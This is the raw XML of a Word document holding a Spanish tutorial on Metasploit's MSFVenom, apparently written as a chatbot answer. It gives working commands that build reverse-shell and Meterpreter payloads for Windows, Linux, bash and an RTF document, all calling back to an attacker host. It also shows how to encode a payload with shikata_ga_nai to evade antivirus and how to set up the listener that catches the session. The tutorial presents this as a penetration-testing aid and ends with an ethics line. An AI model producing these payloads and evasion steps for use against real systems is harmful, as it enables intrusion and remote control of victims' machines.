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MSFVenom es una herramienta incluida en el framework Metasploit que combina las funcionalidades de </w:t>
      </w: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msfpayload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msfencode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. Permite generar payloads y codificarlos para crear exploits personalizados. A continuación, te proporciono información detallada sobre su uso, así como algunos ejemplos prácticos.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Conceptos Básicos de MSFVenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C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Payloads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: Son fragmentos de código que se ejecutan en el sistema objetivo. Metasploit ofrece una amplia gama de payloads que van desde simples comandos de shell hasta complejas sesiones de Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C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Encoders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: Se utilizan para evitar la detección por sistemas de seguridad como antivirus o IDS/IPS. Codifican el payload de manera que sea menos reconocible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3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Formatos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: MSFVenom permite generar payloads en múltiples formatos, como ejecutables, scripts, DLLs, etc.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Uso Básico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sintaxis general para </w:t>
      </w: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msfvenom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la siguiente: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msfvenom -p &lt;payload&gt; [opciones] -f &lt;formato&gt; -o &lt;output&gt;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Opciones Comunes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3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-p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 Especifica el payload a utilizar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3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LHOST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 Define la dirección IP del atacante (listener).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3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LPORT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 Define el puerto en el que el atacante escuchará la conexión.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3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-e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 Especifica el encoder a utilizar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3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-i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 Define el número de iteraciones del encoder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3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-f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 Especifica el formato del output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3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-o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 Especifica el nombre del archivo de salida.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Ejemplos de Uso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Crear un Payload para Windows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Generar un ejecutable que al ejecutarse establecerá una conexión inversa con el atacante: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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe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2. Crear un Payload para Linux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Generar un ejecutable para Linux que establezca una conexión inversa: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bash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msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf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3. Codificar un Payload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Usar un encoder para codificar el payload y evitar la detección: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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o encoded_shell.exe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4. Generar un Payload en un Script de Bash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Crear un payload que se ejecuta como un script de Bash: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msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.sh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5. Crear un Payload para un Documento Office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Generar un payload que se incrusta en un documento de Word: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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f rtf -o shell.rtf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Completo: Crear y Utilizar un Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3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Generar el Payload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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3D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Configurar el Listener en Metasploit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msfconsole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En la consola de Metasploit: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msf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use exploit/multi/handler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set payload windows/meterpreter/reverse_tcp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set LHOST 192.168.1.100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set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3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run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3D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Ejecutar el Payload en el Objetivo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Transfiere el archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="001C3D8B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>payload.exe</w:t>
      </w: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sistema objetivo y ejecútalo. Una vez ejecutado, Metasploit capturará la sesión de Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3D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1C3D8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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3D8B" w:rsidRPr="001C3D8B" w:rsidRDefault="001C3D8B" w:rsidP="001C3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C3D8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>MSFVenom es una herramienta poderosa para generar y codificar payloads en diversas plataformas. Es fundamental utilizarla de manera ética y legal, respetando siempre las leyes y regulaciones aplicables. Si tienes más preguntas o necesitas más ejemplos específicos, no dudes en preguntar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2342" w:rsidRDefault="001C3D8B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6230F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F14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53027"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE0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473D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="977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10C48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C82CE9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5077CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23E20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9D"/>
    <w:rsid w:val="00075EE0"/>
    <w:rsid w:val="001C3D8B"/>
    <w:rsid w:val="00E001F3"/>
    <w:rsid w:val="00E0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C3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1C3D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3D8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1C3D8B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C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C3D8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C3D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D8B"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20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C3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1C3D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3D8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1C3D8B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C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C3D8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C3D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D8B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2766</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>23</Lines>
  <Paragraphs>6</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Luffi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2024-07-15T05:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-15T05:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>